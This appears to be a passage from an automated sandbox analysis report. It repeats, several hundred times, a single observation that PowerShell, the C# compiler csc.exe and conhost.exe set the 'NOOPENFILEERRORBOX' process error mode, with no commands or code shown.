        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
